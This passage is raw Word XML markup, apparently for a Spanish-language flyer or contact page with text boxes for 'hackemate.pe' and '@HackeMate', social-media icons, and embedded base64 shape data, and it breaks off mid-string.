gKUWWpiFpTIweWnvxNrBbIO4HstsW++udnvQ2k/fJO88Uq8lodlKj750V8DiLgCnbONnb&#10;VsD+Y/OQAfMBrUTtrBLwozysytubAnPpznarTrvQMiqxPkcBXQhDzrlvOmXQz9ygLGUHNxoMtI4t&#10;lyOeqdxoHkdRyg32li50OKiqU83X7mgEvFabd9zWsckuunp5O6yH7/3nXIj7u2n9DCyoKfzBcNUn&#10;dSjJqXZHKz3TAp6SOCVUQLJYLoARkS4TGmqK5lkCvCz4/x/KXwAAAP//AwBQSwECLQAUAAYACAAA&#10;ACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIt&#10;ABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQIt&#10;ABQABgAIAAAAIQBv6iuwGgIAADMEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItABQABgAIAAAAIQB5xEYG4wAAAAsBAAAPAAAAAAAAAAAAAAAAAHQEAABkcnMvZG93bnJldi54&#10;bWxQSwUGAAAAAAQABADzAAAAhAUAAAAA&#10;" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6639F077" w14:textId="0BB0F1D3" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:hyperlink r:id="rId18" w:history="1">
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>hackemate.pe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A9171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9606152" wp14:editId="6C7D997E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2709359</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1725930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1605776" cy="498831"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1444768941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776" cy="4988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E170BC" w14:textId="3D7BB5AA" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="0000000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hyperlink r:id="rId19" w:history="1">
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>@HackeMate</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r w:rsidR="00A91712" w:rsidRPr="00A91712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06152" id="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:213.35pt;margin-top:135.9pt;width:126.45pt;height:39.3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pPYGgIAADMEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8lu2zAQvRfIPxC8x5Idr4LlwE3gooCR&#10;BHCKnGmKtARQHJakLblf3yHlDWlPRS/UULO/9zh/bGtFDsK6CnRO+72UEqE5FJXe5fTH++p+Sonz&#10;TBdMgRY5PQpHHxd3X+aNycQASlCFsASLaJc1Jqel9yZLEsdLUTPXAyM0OiXYmnm82l1SWNZg9Vol&#10;gzQdJw3Ywljgwjn8+9w56SLWl1Jw/yqlE56onOJsPp42nttwJos5y3aWmbLipzHYP0xRs0pj00up&#10;Z+YZ2dvqj1J1xS04kL7HoU5AyoqLuANu008/bbMpmRFxFwTHmQtM7v+V5S+HjXmzxLdfoUUCAyCN&#10;cZnDn2GfVto6fHFSgn6E8HiBTbSe8JA0TkeTyZgSjr7hbDp9iGWSa7axzn8TUJNg5NQiLREtdlg7&#10;jx0x9BwSmmlYVUpFapQmTU7HD6M0Jlw8mKE0Jl5nDZZvty2pipzOzntsoTjiehY65p3hqwpnWDPn&#10;35hFqnEjlK9/xUMqwF5wsigpwf762/8Qjwygl5IGpZNT93PPrKBEfdfIzaw/HAatxctwNBngxd56&#10;trceva+fANXZx4dieDRDvFdnU1qoP1Dly9AVXUxz7J1TfzaffCdofCVcLJcxCNVlmF/rjeGhdEA1&#10;IPzefjBrTjR4JPAFziJj2Sc2utiOj+Xeg6wiVQHnDtUT/KjMyODpFQXp395j1PWtL34DAAD//wMA&#10;UEsDBBQABgAIAAAAIQDsiXSg4wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT4NAEIXvJv6H&#10;zZh4s0uxhYosTUPSmBg9tPbibWCnQGRnkd226K93PelxMl/e+16+nkwvzjS6zrKC+SwCQVxb3XGj&#10;4PC2vVuBcB5ZY2+ZFHyRg3VxfZVjpu2Fd3Te+0aEEHYZKmi9HzIpXd2SQTezA3H4He1o0IdzbKQe&#10;8RLCTS/jKEqkwY5DQ4sDlS3VH/uTUfBcbl9xV8Vm9d2XTy/HzfB5eF8qdXszbR5BeJr8Hwy/+kEd&#10;iuBU2RNrJ3oFizhJA6ogTudhQyCS9CEBUSm4X0YLkEUu/28ofgAAAP//AwBQSwECLQAUAAYACAAA&#10;ACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIt&#10;ABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQIt&#10;ABQABgAIAAAAIQA63pPYGgIAADMEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItABQABgAIAAAAIQDsiXSg4wAAAAsBAAAPAAAAAAAAAAAAAAAAAHQEAABkcnMvZG93bnJldi54&#10;bWxQSwUGAAAAAAQABADzAAAAhAUAAAAA&#10;" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="61E170BC" w14:textId="3D7BB5AA" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:hyperlink r:id="rId20" w:history="1">
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>@HackeMate</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r w:rsidR="00A91712" w:rsidRPr="00A91712"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63D49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E65DAEA" wp14:editId="7278AA17">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2104390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3058795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874645" cy="480695"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="324208194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48069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266700" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                            <a:srgbClr val="000000"/>
                          </a:outerShdw>
                        </a:effectLst>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="01906C2A" w14:textId="6200F059" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="48"/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117A9F" wp14:editId="0E9A1303">
                                  <wp:extent cx="341523" cy="341523"/>
                                  <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                                  <wp:docPr id="2054033662" name="Imagen 2054033662" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza baj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1232251" name="Imagen 12" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza baj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5703" cy="3557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48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C922562" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="4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5DAEA" id="Cuadro de texto 10" o:spid="_x0000_s1036" style="position:absolute;margin-left:165.7pt;margin-top:240.85pt;width:226.35pt;height:37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rPYjgIAACAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X+1kTpoGdYqsRYcB&#10;RVs0HXqWZTk2JouaRMfufv0o5bPdTsN8kEWRIh8fSV1eDa1mG+V8Aybno7OUM2UklI1Z5/z78+2n&#10;GWcehSmFBqNy/qo8v1p8/HDZ27kaQw26VI6RE+Pnvc15jWjnSeJlrVrhz8AqQ8oKXCuQRLdOSid6&#10;8t7qZJym06QHV1oHUnlPpzdbJV9E/1WlJD5UlVfIdM4JG8bVxbUIa7K4FPO1E7Zu5A6G+AcUrWgM&#10;BT24uhEoWOeaP1y1jXTgocIzCW0CVdVIFXOgbEbpu2xWtbAq5kLkeHugyf8/t/J+s7KPjuHwBQYq&#10;YCCkt37u6TDkM1SuDX9CykhPFL4eaFMDMkmH49l5Ns0mnEnSZbN0ejEJbpLjbes8flXQsrDJuYPO&#10;lE9Um0iZ2Nx53Nrv7UJED7opbxutoxD6QV1rxzaCKqkxAqUIb6y0YX3Op58naXT8RhdcH+4XWsgf&#10;O4wnVuRPmxBOxc4hWDH1DpVb1WXPCt25J1FSxtPpeUpclE1IZ5LOtgL11SRLw8eZ0GsaCImOMwf4&#10;0mAdqxnIiwm5dXGAE6/EXiQEsA8XGTxBkhzrEnY4FANrCMwo3gxHBZSvVEuKFyvlrbxtKO074fFR&#10;OOprwkWzig+0VBqIK9jtOKvB/frbebCndiMtZz3NSc79z044xZn+ZqgRL0ZZRm4xCtnkfEyCO9UU&#10;pxrTtddABRzRq2Bl3AZ71Ptt5aB9oZFehqikEkZS7JzjfnuN2+mlJ0Gq5TIa0ShZgXdmZWVwHfgN&#10;5X4eXoSzu55D6tZ72E+UmL/ruq1tuGlg2SFUTWzJI6tUjSDQGMa67J6MMOencrQ6PmyL3wAAAP//&#10;AwBQSwMEFAAGAAgAAAAhAFdIKrbeAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FOwzAQRfdI&#10;3MEaJHbUCXVIFDKpEBISW5oeYBIPSdrYjmK3DZwes4Ll6D/9/6barWYSF1786CxCuklAsO2cHm2P&#10;cGjeHgoQPpDVNDnLCF/sYVff3lRUane1H3zZh17EEutLQhhCmEspfTewIb9xM9uYfbrFUIjn0ku9&#10;0DWWm0k+JsmTNDTauDDQzK8Dd6f92SCcsqNq+zbJ34+jzr5VwxM1jHh/t748gwi8hj8YfvWjOtTR&#10;qXVnq72YELbbVEUUQRVpDiISeaFSEC1CluUKZF3J/z/UPwAAAP//AwBQSwECLQAUAAYACAAAACEA&#10;toM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQA&#10;BgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQA&#10;BgAIAAAAIQAXTrPYjgIAACAFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQBXSCq23gAAAAsBAAAPAAAAAAAAAAAAAAAAAOgEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAA8wUAAAAA&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="01906C2A" w14:textId="6200F059" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/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117A9F" wp14:editId="0E9A1303">
                            <wp:extent cx="341523" cy="341523"/>
                            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                            <wp:docPr id="2054033662" name="Imagen 2054033662" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza baj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1232251" name="Imagen 12" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza baja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5703" cy="3557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48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C922562" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-E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663D49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72F998" wp14:editId="5BE4C579">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2101174</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3730949</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874928" cy="481114"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="704692754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928" cy="481114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266700" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                            <a:srgbClr val="000000"/>
                          </a:outerShdw>
                        </a:effectLst>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="31A333A2" w14:textId="18C972A1" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="48"/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3F3DAB" wp14:editId="2C2D7EEC">
                                  <wp:extent cx="354330" cy="354330"/>
                                  <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                                  <wp:docPr id="1154244774" name="Imagen 1154244774" descr="Facebook Logo - PNG y Vecto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 descr="Facebook Logo - PNG y Vector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1154" cy="3711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48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D00A059" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="4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72F998" id="_x0000_s1037" style="position:absolute;margin-left:165.45pt;margin-top:293.8pt;width:226.35pt;height:37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jmjwIAACAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0X21nTpoGcYqsRYcB&#10;RVs0HXqWZTk2JouaxMTufv0o5dG022mYD7IoUnx8H6n55dBptlXOt2AKnp2lnCkjoWrNuuDfn24+&#10;TTnzKEwlNBhV8Bfl+eXi44d5b2dqBA3oSjlGToyf9bbgDaKdJYmXjeqEPwOrDClrcJ1AEt06qZzo&#10;yXunk1GaTpIeXGUdSOU9nV7vlHwR/de1knhf114h0wWn3DCuLq5lWJPFXMzWTtimlfs0xD9k0YnW&#10;UNCjq2uBgm1c+4errpUOPNR4JqFLoK5bqWINVE2Wvqtm1QirYi0EjrdHmPz/cyvvtiv74BgOX2Ag&#10;AgMgvfUzT4ehnqF2XfhTpoz0BOHLETY1IJN0OJqe5xcjIlqSLp9mWZYHN8nrbes8flXQsbApuION&#10;qR6JmwiZ2N563Nkf7EJED7qtblqtoxD6QV1px7aCmNQYE6UIb6y0YX3BJ5/HaXT8RhdcH++XWsgf&#10;+xxPrMifNiGcip1DacXSN6jcqql6VuqNexQVVTyZnKeERdWGcsbpdCdQX43zNHycCb2mgZDoOHOA&#10;zy02kc0AXizIrctjOvFK7EXKAA7hIoInmSSvvIQdDuXAWkomO5JWQvVCXFK8yJS38qalsm+Fxwfh&#10;qK8pL5pVvKel1kBYwX7HWQPu19/Ogz21G2k562lOCu5/boRTnOlvhhrxIstzcotRyMfnIxLcqaY8&#10;1ZhNdwVEYEavgpVxG+xRH7a1g+6ZRnoZopJKGEmxC46H7RXuppeeBKmWy2hEo2QF3pqVlcF1wDfQ&#10;/TQ8C2f3PYfUrXdwmCgxe9d1O9tw08Byg1C3sSUD0DtUiY0g0BhGXvZPRpjzUzlavT5si98AAAD/&#10;/wMAUEsDBBQABgAIAAAAIQA02+OC3QAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3&#10;SPyDNUjsqA15No1TISQktjR8wCQekrR+RLHbBr4es4LdjObozrn1fjWaXWjxk7MSHjcCGNneqckO&#10;Ej7a14cSmA9oFWpnScIXedg3tzc1Vspd7TtdDmFgMcT6CiWMIcwV574fyaDfuJlsvH26xWCI6zJw&#10;teA1hhvNn4TIucHJxg8jzvQyUn86nI2EU3ZMu6ETxdtxUtl32pLGlqS8v1ufd8ACreEPhl/9qA5N&#10;dOrc2SrPtIQkEduISsjKIgcWiaJM4tBJyPMkBd7U/H+H5gcAAP//AwBQSwECLQAUAAYACAAAACEA&#10;toM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQA&#10;BgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQA&#10;BgAIAAAAIQCRfIjmjwIAACAFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQA02+OC3QAAAAsBAAAPAAAAAAAAAAAAAAAAAOkEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAA8wUAAAAA&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="31A333A2" w14:textId="18C972A1" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/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3F3DAB" wp14:editId="2C2D7EEC">
                            <wp:extent cx="354330" cy="354330"/>
                            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                            <wp:docPr id="1154244774" name="Imagen 1154244774" descr="Facebook Logo - PNG y Vecto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 descr="Facebook Logo - PNG y Vector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1154" cy="3711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48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D00A059" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-E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663D49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A9203DD" wp14:editId="385A91A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2121103</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2392220</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874928" cy="481114"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="68540719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928" cy="481114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266700" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                            <a:srgbClr val="000000"/>
                          </a:outerShdw>
                        </a:effectLst>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3D5913A9" w14:textId="7A8E0BB2" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="48"/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6398FC" wp14:editId="25F0D5FD">
                                  <wp:extent cx="354887" cy="354330"/>
                                  <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                                  <wp:docPr id="892760281" name="Imagen 892760281" descr="Icon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2760281" name="Imagen 892760281" descr="Icono&#10;&#10;Descripción generada automá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8306" cy="3677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48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1D5421E0" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="4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9203DD" id="_x0000_s1038" style="position:absolute;margin-left:167pt;margin-top:188.35pt;width:226.35pt;height:37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lCkAIAACAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0X21nTpoGcYqsRYcB&#10;RVs0HXqWZTk2JouaxMTufv0o5dG022mYD7IoUnx8H6n55dBptlXOt2AKnp2lnCkjoWrNuuDfn24+&#10;TTnzKEwlNBhV8Bfl+eXi44d5b2dqBA3oSjlGToyf9bbgDaKdJYmXjeqEPwOrDClrcJ1AEt06qZzo&#10;yXunk1GaTpIeXGUdSOU9nV7vlHwR/de1knhf114h0wWn3DCuLq5lWJPFXMzWTtimlfs0xD9k0YnW&#10;UNCjq2uBgm1c+4errpUOPNR4JqFLoK5bqWINVE2Wvqtm1QirYi0EjrdHmPz/cyvvtiv74BgOX2Ag&#10;AgMgvfUzT4ehnqF2XfhTpoz0BOHLETY1IJN0OJqe5xcjIlqSLp9mWZYHN8nrbes8flXQsbApuION&#10;qR6JmwiZ2N563Nkf7EJED7qtblqtoxD6QV1px7aCmNQYE6UIb6y0YX3BJ5/HaXT8RhdcH++XWsgf&#10;+xxPrMifNiGcip1DacXSN6jcqql6VuqNexQVVTyZnKeERdWGcsbpdCdQX43zNHycCb2mgZDoOHOA&#10;zy02kc0AXizIrctjOvFK7EXKAA7hIoInmSSvvIQdDuXAWkomGx1IK6F6IS4pXmTKW3nTUtm3wuOD&#10;cNTXlBfNKt7TUmsgrGC/46wB9+tv58Ge2o20nPU0JwX3PzfCKc70N0ONeJHlObnFKOTj8xEJ7lRT&#10;nmrMprsCIjCjV8HKuA32qA/b2kH3TCO9DFFJJYyk2AXHw/YKd9NLT4JUy2U0olGyAm/NysrgOuAb&#10;6H4anoWz+55D6tY7OEyUmL3rup1tuGlguUGo29iSAegdqsRGEGgMIy/7JyPM+akcrV4ftsVvAAAA&#10;//8DAFBLAwQUAAYACAAAACEAheUSat4AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPzW6DMBCE&#10;75X6DtZG6q0xSSBEFBNVlSr12pAHWPAWSPyDsJPQPn03p/Y2ox3NflPuZ2vElaYweKdgtUxAkGu9&#10;Hlyn4Fi/P+9AhIhOo/GOFHxTgH31+FBiof3NfdL1EDvBJS4UqKCPcSykDG1PFsPSj+T49uUni5Ht&#10;1Ek94Y3LrZHrJNlKi4PjDz2O9NZTez5crIJzdkqbrknyj9Ogs5+0JoM1KfW0mF9fQESa418Y7viM&#10;DhUzNf7idBBGwWaT8pbIIt/mIDiR7+6iUZBm6wxkVcr/G6pfAAAA//8DAFBLAQItABQABgAIAAAA&#10;IQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0A&#10;FAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0A&#10;FAAGAAgAAAAhAFGsKUKQAgAAIAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAIXlEmreAAAACwEAAA8AAAAAAAAAAAAAAAAA6gQAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAAD1BQAAAAA=&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3D5913A9" w14:textId="7A8E0BB2" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/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6398FC" wp14:editId="25F0D5FD">
                            <wp:extent cx="354887" cy="354330"/>
                            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                            <wp:docPr id="892760281" name="Imagen 892760281" descr="Icon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2760281" name="Imagen 892760281" descr="Icono&#10;&#10;Descripción generada automá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8306" cy="3677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48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1D5421E0" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-E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663D4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F327933" wp14:editId="35BF0513">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2124724</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1720404</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874928" cy="481114"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="7374165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928" cy="481114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266700" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                            <a:srgbClr val="000000"/>
                          </a:outerShdw>
                        </a:effectLst>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="017738E8" w14:textId="6BC75915" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es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CD0B40" wp14:editId="4CBD5073">
                                  <wp:extent cx="466927" cy="322922"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                                  <wp:docPr id="1232229529" name="Imagen 1232229529" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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V="1">
                                            <a:off x="0" y="0"/>
                                            <a:ext cx="470123" cy="3251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48"/>
                                <w:szCs w:val="48"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39D865FA" w14:textId="33EAB9C9" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="4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327933" id="_x0000_s1039" style="position:absolute;margin-left:167.3pt;margin-top:135.45pt;width:226.35pt;height:37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maXkAIAACAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN1P2zAQf5+0/8Hy+0hS0lIqUtSBmCYh&#10;QJSJZ8dxmmiOz7OvTdhfz9n9oLA9TcuD4/Od7+P3u/PF5dBptlHOt2AKnp2knCkjoWrNquA/nm6+&#10;TDnzKEwlNBhV8Bfl+eX886eL3s7UCBrQlXKMnBg/623BG0Q7SxIvG9UJfwJWGVLW4DqBJLpVUjnR&#10;k/dOJ6M0nSQ9uMo6kMp7Or3eKvk8+q9rJfG+rr1CpgtOuWFcXVzLsCbzCzFbOWGbVu7SEP+QRSda&#10;Q0EPrq4FCrZ27R+uulY68FDjiYQugbpupYo1UDVZ+qGaZSOsirUQON4eYPL/z6282yztg2M4fIWB&#10;CAyA9NbPPB2GeobadeFPmTLSE4QvB9jUgEzS4Wh6lp+PiGhJunyaZVke3CRvt63z+E1Bx8Km4A7W&#10;pnokbiJkYnPrcWu/twsRPei2umm1jkLoB3WlHdsIYlJjTJQivLPShvUFn5yO0+j4nS64PtwvtZA/&#10;dzkeWZE/bUI4FTuH0oqlr1G5ZVP1rNRr9ygqqngyOUsJi6oN5YzT6Vagvhrnafg4E3pFAyHRceYA&#10;n1tsIpsBvFiQW5WHdOKV2IuUAezDRQSPMkneeAk7HMqBtZRMdronrYTqhbikeJEpb+VNS2XfCo8P&#10;wlFfU140q3hPS62BsILdjrMG3O+/nQd7ajfSctbTnBTc/1oLpzjT3w014nmW5+QWo5CPz0YkuGNN&#10;eawx6+4KiMCMXgUr4zbYo95vawfdM430IkQllTCSYhcc99sr3E4vPQlSLRbRiEbJCrw1SyuD64Bv&#10;oPtpeBbO7noOqVvvYD9RYvah67a24aaBxRqhbmNLBqC3qBIbQaAxjLzsnoww58dytHp72OavAAAA&#10;//8DAFBLAwQUAAYACAAAACEAv4asSN4AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF&#10;90j8gzVI7KhNk8YlxKkQEhJbmn6AEw9JWj+i2G0DX8+wguXoHt17ptotzrILznEMXsHjSgBD3wUz&#10;+l7BoXl72AKLSXujbfCo4Asj7Orbm0qXJlz9B172qWd